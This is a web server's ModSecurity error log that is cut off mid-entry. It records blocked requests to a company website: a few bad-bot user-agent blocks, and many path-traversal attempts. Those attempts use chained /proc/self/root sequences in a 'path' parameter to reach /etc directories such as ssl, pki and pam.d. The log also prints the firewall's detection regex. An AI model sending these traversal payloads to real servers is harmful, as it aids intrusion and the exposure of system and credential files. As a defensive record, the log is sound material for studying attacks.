[Tue Mar 17 09:13:15.771139 2026] [:error] [pid 2473:tid 140411666392832] [client 74.7.244.31:36618] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablFW6BJNF7axNlVR0X6XQAAAAk"]
[Tue Mar 17 09:13:39.736654 2026] [:error] [pid 2325:tid 140411632822016] [client 74.7.241.46:60410] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFc-82sZHvlq4xgHrAUQAAAo0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:13:49.371484 2026] [:error] [pid 11469:tid 140411557287680] [client 74.7.243.203:33568] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFfZDEJR9VXonE_-1MfQAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:13:50.099725 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.228.16:40414] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablFfgeiSKl8TjouI-YALQAAA8Y"]
[Tue Mar 17 09:14:06.764523 2026] [:error] [pid 1961:tid 140411649607424] [client 74.7.243.203:58354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFjnRXaaWotPICgYsi6wAAA0s"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 09:14:08.124773 2026] [:error] [pid 7437:tid 140411599251200] [client 74.7.243.203:46028] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFkAeiSKl8TjouI-YAPgAAA9E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:14:12.287109 2026] [:error] [pid 11293:tid 140411632822016] [client 74.7.241.46:40308] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFlNCmCSWTlPouqorIsQAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:14:13.853599 2026] [:error] [pid 1961:tid 140411641214720] [client 74.7.243.203:46040] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablFlXRXaaWotPICgYsi8QAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:19.808015 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.243.203:59902] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF1nRXaaWotPICgYsjQgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 09:15:24.511705 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.241.46:40868] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF3NCmCSWTlPouqorJCQAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:25.903561 2026] [:error] [pid 2325:tid 140411649607424] [client 74.7.241.46:32826] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF3e82sZHvlq4xgHrAigAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:27.226426 2026] [:error] [pid 11293:tid 140411557287680] [client 74.7.241.46:32842] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF39CmCSWTlPouqorJCgAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:29.855907 2026] [:error] [pid 7000:tid 140411691570944] [client 74.7.241.46:53272] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF4RePVOt35XCGZP8tlQAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:32.364991 2026] [:error] [pid 11469:tid 140411599251200] [client 74.7.241.46:53286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF5JDEJR9VXonE_-1MtAAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:40.979449 2026] [:error] [pid 7000:tid 140411574073088] [client 74.7.241.46:53288] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF7BePVOt35XCGZP8towAAA5Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:42.050884 2026] [:error] [pid 1210:tid 140411574073088] [client 74.7.243.203:52590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF7lKJy4A1bGlmj9BTHgAAAlQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:15:45.837298 2026] [:error] [pid 1961:tid 140411540502272] [client 74.7.243.203:52560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF8XRXaaWotPICgYsjUQAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:46.151386 2026] [:error] [pid 11469:tid 140411725141760] [client 74.7.241.46:56274] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF8pDEJR9VXonE_-1MwQAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:47.539181 2026] [:error] [pid 1210:tid 140411716749056] [client 74.7.241.46:56286] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF81KJy4A1bGlmj9BTIgAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:15:56.440162 2026] [:error] [pid 2473:tid 140411616036608] [client 74.7.243.203:52564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablF-6BJNF7axNlVR0X6sgAAAA8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 09:16:00.571979 2026] [:error] [pid 2325:tid 140411548894976] [client 74.7.243.203:54326] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGAO82sZHvlq4xgHrAnQAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:16:20.199250 2026] [:error] [pid 2325:tid 140411540502272] [client 74.7.243.203:43228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablGFO82sZHvlq4xgHrArQAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 09:16:24.685361 2026] [:error] [pid 7000:tid 140411683178240] [client 74.7.243.203:36452] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname 